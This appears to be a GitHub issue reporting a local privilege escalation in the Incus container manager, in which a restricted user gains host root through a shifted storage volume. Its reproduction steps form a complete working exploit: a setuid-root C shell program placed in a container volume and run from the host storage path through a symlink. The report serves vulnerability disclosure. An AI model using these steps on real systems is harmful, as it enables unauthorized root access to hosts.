Local privilege escalation: a local unprivileged user in a restricted project may obtain host root privileges under certain conditions. #2641
Description
Is there an existing issue for this?
- There is no existing issue for this bug
Is this happening on an up to date version of Incus?
- This is happening on a supported version of Incus
Incus system details
tested on debian 13 & archlinuxInstance details
No response
Instance log
No response
Current behavior
No response
Expected behavior
No response
Steps to reproduce
incus launch images:alpine/edge ct1
incus storage volume create default data
incus config device add ct1 test disk pool=default source=data path=/data
incus storage volume set default data security.shifted=true
cat shell.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
setuid(0);
system("su");
}
gcc shell.c -o shell
incus file push shell ct1/data/
incus exec ct1 -- chown 0:0 /data/shell
incus exec ct1 -- chmod 4755 /data/shell
ln -s /var/lib/incus/storage-pools/default/custom/user-1000_data/shell sh
./sh
Metadata
Metadata
Assignees
Labels
No labels